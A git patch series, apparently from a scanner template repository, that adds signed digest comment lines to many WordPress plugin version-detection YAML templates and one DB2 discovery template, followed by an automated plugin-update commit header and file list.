a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009c97643a613746e1ae8a46cac191a865b91cc86c6167465275dac4a8d44c664f0220067fc9dccffaeb1d218c8cc3e8a1856a7b8cee0731d9918f6f7857b8e53a3f74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 27586cbd9d..b719ccc11b 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100eb22d1720c5f909a631f3911f7137a7cb0b74369dbd91797fc30dab4ae53ee33022007081ab15df2ba7bd65e719219b50d60cc52b9634fcdcdc37fefd74969f942d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index 946272f0a9..19e7517c46 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c4514e2c2c9fd4977bccb716a30e8307d496a670baa73f4cc2b7fb833361be15022100a7e9f327dbfc2e485ecd276e9964f02872437133130e7093427251397ed8e5cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index aa29706872..4da79e6e92 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204cca94d60b720b1336a9501d0683b77a37a2e7a935ddcb5a849f6ad176436c94022100bba7c54c69a688f926bc877114009a5587c153c54a1ed0108909ac91169f885a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 290d53ab7e..69bcdaab01 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d7b61a63a98f7e85456b513cbb62ed81f673951b1d462dd66017f71acf922530022100ab4e2a85f7efd4bfb5e0e7031e8f677650a5971730c93c823d603a091b3e4e71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index e83e8d79e7..aedf82d0b1 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022003b4f678edb6b182ca9bc8f853e66e3c08cedbc0b9b55ee6c8752aa89361be2b02203592f402660f69d1254cf5f57a63122122663e44276cc7b4ad9c9ca0e013e542:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index f1c16275a2..3ea002bd93 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201a25b6661bb321ed8e61b686ce743c861ed7db82c6ef1f3b9bcc7cddafb14fef02210093be0a66c60481d87d0ad00faff6935d1460d1a21ad8fc55d44d26ef754da20c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index fc072e19d8..ddecc14133 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f87beece6d0c535c155cdd316407e57737a836e67514da8d4f8495c5192467d902204b54d7d8cec999091d61eaf448decf5f8b3010907771bb907a4a39876b473616:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index da9df0e8a5..03193bf765 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100fa10e5086ff5ac6981b74e924475ea149ee68738a6f119a19172cebba510ec3e022100d53459f4d0373f39343be110abcbf0f26635e0778f0e3f2185fef579a2dac710:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index f8113d9750..a9def8f46e 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f91320cbb0e9e63001e2dc9761068f4ad2cd377a0b5c9156967dade8b733328102202fecd03a4046bdb11f4a1eca525140747ceeb61789c69670514133ba44c217b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 5f80282ab2..05cb2f2349 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203db124588b0c2f47fa5a181b0cc5f80d92a8a00f56cb501ed5659683cf80c2a7022100d0e4e2da992ff314bcf170aa23a95b53e278f9ce4c14d7a0fc85f467d0c9a686:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 5725d5bb3f..d43bc2e4d6 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b182c960758263abf629cd1503657de4c7fce1110d8ecdfe7b2351188db60808022100a4e294c5da82d83ddb56425cc8f45fe5e9a39fb7c6a706a47f26c0cf013ee7f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index f67a8bc18a..b5b4d8b62b 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022056f0859f26ef432f650db71bd0d05c5a1123742c0af01efa97ff2ab676996dc2022100a4fa4a8171b32277f3edab96cbddb501f7bd74635bf78e7b4a9f8704a2f4817d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-crontrol.yaml b/http/technologies/wordpress/plugins/wp-crontrol.yaml index a773829b7d..c6467029e2 100644 --- a/http/technologies/wordpress/plugins/wp-crontrol.yaml +++ b/http/technologies/wordpress/plugins/wp-crontrol.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100cfdd23a01c59a6047ebae57b6cd1288affa19f2b730389a2820cb5d6babc260902202b1a2c72fee42da8140b094bb90efdc861889532c0c870f4891d74d50021b624:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index b9bd4be0a8..990d628be7 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008090095de00ce74f20990862c612bdd57033f29d3bca9432ac0b8e8b9f3762fe022100f88768253c5bbecbafa5476118f5af00c74fcb3b2db4f7db02ea8332e33db2b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index bece4ce486..e9ed82bafa 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210098132104e9022d1d3c583ea0055b4d2b6a85b2d66eec0f8922f0028688c8c973022073199c1c94314af7b666fb9475c8a813a32e578eea560ba71b93b620719d4904:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 138b0aa9a6..ddd2e829dc 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a6787b14e2018e6dfbcc1ca03d6cbefbb2130caa32de600345ebe15be9742d04022100d6407ecd30a700fb0adab5d3d043b3d7f5a924b8d9bb4a18e49f92edd74c0915:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 68bf71bc83..07204c8f74 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100cf8a4dc89f71fd4ec985e121834abf27d27516f39a62b6afe0b5d9bbd45f7d1e0221009c88dfbab25851f4e766e9f531de0049679cd2da8350c88a3bb72233a5f5f5f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 10dad2d2fb..aad0659f82 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022058c12d70842dbbcdf5e862b874325bd42ca167e1b97a0afaa07d5c3b2d04471a02204ba873222560b9a015da2978ed0e4e5bfb9bf8a2bc4622f8e9e7dc4d1ea34b66:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index e9efe6fb53..5c8575e958 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100cdf34b5a14d4a5a2137312303d5d74304d883b11a80b5965fa4b79c25953578802203e274e53d19565ae1257751a839d659f8633f15c93af552423019e9aaa9988e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index c3d10f0135..3bfd9c9ef9 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201301351836f84ead9c81eca1e97aae2609109d36359d247be00276c43634f91302210081ffb1b6f02f5a278a51c52acc5fcfa671e1b10d86f4f72fb4582e8edd196773:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 4a8bc6b75c..28002570a4 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022070509df922287d3e71b9cf9e623b818afd444701ad4e2a13b33692a8cc5512fa022100c59580c1d31e88b853ce6ed9b32c5f26cae8c4ac3909da5e5a284f38a43d90c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index d2c74355bd..89cf25f23b 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220595290d54136c5390edbf6c504def6f1314242b31e3aaeb022e8d65c769a440d02206a57086a46e87d1996595778d3a15c54daea0a0868afda61c3d2a9b6e557d1b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 94b8494b08..86b4a58607 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ca2bb4847c6fd22bffe233d23feb37a8abaa2f40bc86d7f9d82b1cefaf6085e4022100f0b96ee3e9ab9daf576d458e8dae869617f6c73f66a61d1348b2f40fe9ed3f3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 108aba79e9..eda6c80366 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100dab42d19f7f02ad2eb372dce955e9d7c2377cb1cda3c5eb734be85c062638e0a0221009bdd6a38bb1c69e6f88521808049fcc9d4292903269e4b71fe830158e72dee72:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index f6f6bf5566..8db0a1eab6 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220341ef29aea057b215e590feb41a16117116b6e2847f126a5646e1ab47cb13efd022100caff0f2f82f4ab64afce14dd6438bbc225525e51b5428232764176ce92e2c5cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 483cb7cac7..c24944c378 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202dd4c7167b6d1e8103ee04feeed68e10f60c88fd5f11522a7d65f8c4591b38d5022100e04f7477ee78d0a6b166239a510ecd1dbd6d403dc57f704d9353482026e20c64:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index a132c98df4..f28d6aeee1 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022040755cac2ee8139447db478c592054ecfdc955e07a2054b5cb42dfedddc837ab02201b3ee5e3ec85988670ce59dcd5326c63c3302e198253a3149ee23d8d887c8c46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 135bbee046..e49daf97d3 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220516674edad0a69de50308336a14db70187d29cc54720aeb52ddd15a0d9981695022100924c47850dcf618bef9e7382f00a0c2de73d0ca50b35ad01fde4161d37414ccc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index 5b690d96c0..1937401a47 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100cbc0e66086eea954483a823cc77f969d7486d9c20b764c5068ba61b884820a2a022100bcac9a6505cf102424066b315633a61d8d76a1d6c65c332892d64632bb6b7a4b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 16c7d6cff5..d965316867 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e41859e91409e6e0707178e532c79d01206f57890620cc3391155a2ffa1035fe02202350085b98ebced46bb6815f89ca794c66848a74fcb87cc9935fa9b026dd8313:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index ab099f357e..362d0179a0 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220419c7f217d7cba1c6a6ee7ea8922e7cffba9cc06f66b0290740f6d886b0e5a6002201ceb9d6950698b6c3ad92de0473cbe3c4d991c7f25a2442cf66d60e112486127:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index ad0b8f8fed..5efd53fe21 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a5c68e0c939c94e7ef05c8fae7c49810da2916547e382a73cd9c18e34488d66d0221009f3e2da7de9d154703ce390b2851f87a0a8fb31a00db61ae1a66ef2e91fe27af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index aaaf0f9a17..1741e17ef6 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b7c945bf017eb55b28cf092aece7451e0ea1a3cd5c2cd288122dd405fbb81caf02204ef766742448db1f76bb8fb5dfd62fd814c73169433053742e39c3a2444572dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index f943c7afeb..ab28167fdc 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bedebb24776cf044ca2b1fc5f6369eb1901c1697a608e26c57edeef595e7d8f7022100ab959ed8b93184d0b55ee7390525a5bf35622d5a088229102a22799be9b18448:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 062e5c85b4..67310807bd 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100cd2c3182461db33f9e7a7154ab4d197a91e59e4b35077cc69f214952d957e01e0221009e817ab1202b66008386fcfb3f932600660ed487752acf5b068dd2d9545f92ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 6dcfdda117..dae60f13cc 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210087653452459bf85a74b28101bcd7ee7ac1380c2dadbd6468da1b4982fd2d421502207cf99cd4a078fa7ffaa3a714c2e31684a47b5f5b5503f01146351dc44ff6069e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/javascript/udp/detection/db2-discover.yaml b/javascript/udp/detection/db2-discover.yaml index 097d576cee..744d6fd827 100644 --- a/javascript/udp/detection/db2-discover.yaml +++ b/javascript/udp/detection/db2-discover.yaml @@ -56,3 +56,4 @@ javascript: - type: dsl dsl: - response +# digest: 490a0046304402200677d57a1569d0d0f52dcb633bc9a8e23baf606b9f8cbcd3a94599d1a42cfd0f022075363935f37f232d23b9ca4ea75ae9caad443a19f2f3f430180e3d9ca1531073:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From b55616cfe946e5a67c4a4520982e2ce27eb4a202 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 3 Aug 2024 00:19:25 +0000 Subject: [PATCH 1839/1841] Auto WordPress Plugins Update [Sat Aug 3 00:19:25 UTC 2024] :robot: --- helpers/wordpress/plugins/post-types-order.txt | 2 +- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 - http/technologies/wordpress/plugins/add-to-any.yaml | 1 - http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 - .../technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 - http/technologies/wordpress/plugins/akismet.yaml | 1 - http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 - .../wordpress/plugins/all-in-one-wp-migration.yaml | 1 - .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 - http/technologies/wordpress/plugins/amp.yaml | 1 - http/technologies/wordpress/plugins/antispam-bee.yaml | 1 - http/technologies/wordpress/plugins/astra-sites.yaml | 1 - http/technologies/wordpress/plugins/autoptimize.yaml | 1 - http/technologies/wordpress/plugins/backwpup.yaml | 1 - http/technologies/wordpress/plugins/better-search-replace.yaml | 1 - http/technologies/wordpress/plugins/better-wp-security.yaml | 1 - .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 - http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 - http/technologies/wordpress/plugins/breeze.yaml | 1 - http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 - http/technologies/wordpress/plugins/chaty.yaml | 1 - .../wordpress/plugins/child-theme-configurator.yaml | 1 - http/technologies/wordpress/plugins/classic-editor.yaml | 1 - http/technologies/wordpress/plugins/classic-widgets.yaml | 1 - .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 - http/technologies/wordpress/plugins/cmb2.yaml | 1 - http/technologies/wordpress/plugins/coblocks.yaml | 1 - http/technologies/wordpress/plugins/code-snippets.yaml | 1 - http/technologies/wordpress/plugins/coming-soon.yaml | 1 - http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 - .../wordpress/plugins/contact-form-7-honeypot.yaml | 1 - http/technologies/wordpress/plugins/contact-form-7.yaml | 1 - http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 - http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 - http/technologies/wordpress/plugins/cookie-notice.yaml | 1 - http/technologies/wordpress/plugins/copy-delete-posts.yaml | 1 - http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 - .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 - http/technologies/wordpress/plugins/custom-css-js.yaml | 1 - http/technologies/wordpress/plugins/custom-fonts.yaml | 1 - http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 - http/technologies/wordpress/plugins/disable-comments.yaml | 1 - http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 - http/technologies/wordpress/plugins/duplicate-page.yaml | 1 - http/technologies/wordpress/plugins/duplicate-post.yaml | 1 - http/technologies/wordpress/plugins/duplicator.yaml | 1 - .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 - .../technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 - http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 - http/technologies/wordpress/plugins/elementor.yaml | 1 - http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 - http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 - http/technologies/wordpress/plugins/envato-elements.yaml | 1 - .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 - http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 - .../wordpress/plugins/facebook-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 - .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 - http/technologies/wordpress/plugins/flamingo.yaml | 1 - http/technologies/wordpress/plugins/fluent-smtp.yaml | 1 - http/technologies/wordpress/plugins/fluentform.yaml | 1 - http/technologies/wordpress/plugins/font-awesome.yaml | 1 - .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/formidable.yaml | 1 - http/technologies/wordpress/plugins/forminator.yaml | 1 - http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 - .../technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 - .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 - .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 - .../wordpress/plugins/google-listings-and-ads.yaml | 1 - http/technologies/wordpress/plugins/google-site-kit.yaml | 1 - .../wordpress/plugins/google-sitemap-generator.yaml | 1 - http/technologies/wordpress/plugins/gtranslate.yaml | 1 - http/technologies/wordpress/plugins/gutenberg.yaml | 1 - .../technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 - .../wordpress/plugins/header-footer-code-manager.yaml | 1 - .../wordpress/plugins/header-footer-elementor.yaml | 1 - http/technologies/wordpress/plugins/header-footer.yaml | 1 - http/technologies/wordpress/plugins/health-check.yaml | 1 - http/technologies/wordpress/plugins/hello-dolly.yaml | 1 - http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 - http/technologies/wordpress/plugins/hostinger.yaml | 1 - http/technologies/wordpress/plugins/image-optimization.yaml | 1 - http/technologies/wordpress/plugins/imagify.yaml | 1 - http/technologies/wordpress/plugins/imsanity.yaml | 1 - .../wordpress/plugins/insert-headers-and-footers.yaml | 1 - http/technologies/wordpress/plugins/instagram-feed.yaml | 1 - .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 - 